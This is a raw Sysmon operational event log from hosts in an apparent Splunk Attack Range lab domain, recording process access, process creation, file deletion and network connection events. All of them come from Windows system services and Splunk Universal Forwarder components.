08:05:32.769{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084091Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:32.769{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B5CC-615A-AD01-00000000FD01}1668C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000084090Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:32.769{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B5CC-615A-AD01-00000000FD01}1668C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000084089Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:32.771{2FDD8D40-B5CC-615A-AD01-00000000FD01}1668C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000084088Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:32.722{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8AF7BA29F868583C42256A865DDD236,SHA256=A0524070ECCA8D0C7E1C5BE99F37052356C747BB058C3A842035DD7133EC1A4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108615Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:32.569{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31C1F9AB4E5B1EA245AF2A11BDFC82E6,SHA256=D1FB23F01DAD8E6573181A937B2A48363EFA6B924CDA0B90BACDF70659475B5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084087Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:32.410{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0EFD8B0B220A0A309CA223CEE8F10B60,SHA256=90FA0F9F0CDF784B1C8D5937FA49F3F71605B394C6B62A3CAF3D5B01FDF5CA58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084086Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:32.410{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C3E46ED81F7583A2BF279D5826E3E2B6,SHA256=49EF856EA057FED3DF704CDC8B1A82D9C7599E0B7F327B4A527F76770FDF5EBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000084085Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:32.113{2FDD8D40-B5CB-615A-AC01-00000000FD01}3608656C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000108614Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:32.154{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=75957F7996B816C6E7D8E0AA81BE3C6F,SHA256=38D4D3591F5B107F994AB62BD9AB1DE5D7EA33738B8728C27D9AE24C5D60BC56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084103Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:33.863{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0EFD8B0B220A0A309CA223CEE8F10B60,SHA256=90FA0F9F0CDF784B1C8D5937FA49F3F71605B394C6B62A3CAF3D5B01FDF5CA58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084102Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:33.801{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=435F47B0351F203824B4F30A653F5577,SHA256=3850EC5C7909606A0EFF856F7B9BF6FC1794A764BA0981422F7981372CA89F5F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108617Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:32.484{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51979-false10.0.1.12-8000- 23542300x8000000000000000108616Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:33.586{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9C5131B7703509E6F8631F03FE5F3C3,SHA256=6A753DBD3AA3AF12E23D308199E294EE9577EF046C91F8845B6F91EAC8EAF224,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108618Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:34.606{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63616EF0B40B17EA9505B28D83D0D1FE,SHA256=B7478117ACCF0359DD9B31BE790A13C83BFB5400225286A0E796D4ECA4F3B736,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084118Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:34.863{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA3F754DC72B612725903D18E8569E21,SHA256=5F0D2D246F3E1B2B8BAADC454F2594686A8E2ED78734C44A7646D8EEF1B7A21F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000084117Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:34.551{2FDD8D40-B5CE-615A-AE01-00000000FD01}10683324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084116Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:34.332{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B5CE-615A-AE01-00000000FD01}1068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084115Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:34.332{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084114Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:34.332{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084113Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:34.332{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084112Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:34.332{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084111Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:34.332{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084110Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:34.332{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084109Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:34.332{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084108Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:34.332{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084107Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:34.332{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084106Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:34.332{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B5CE-615A-AE01-00000000FD01}1068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000084105Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:34.332{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B5CE-615A-AE01-00000000FD01}1068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000084104Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:34.333{2FDD8D40-B5CE-615A-AE01-00000000FD01}1068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000084135Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:35.972{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=327D94EDD1997D60E37A76E58902163D,SHA256=513E0B17EF51675BFD9C996197A4A816FCD4CE55BE7F3F00E1CAC1190580B4F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108619Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:35.620{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C94CA56AD0876FE8F7B9865746EBA440,SHA256=6DDA02D5A1D793405AFBF6DBA3C77208499E68B6ABDB2EDD77FF017445E8B83E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000084134Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:35.801{2FDD8D40-B5CF-615A-AF01-00000000FD01}9203128C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000084133Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:35.488{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9129675F055577327799F7C7FCB581E4,SHA256=793A359E9F374A8A45DE4E701404B002BC2106E09EBC4D79C6D3DA6A34B5B2D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000084132Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 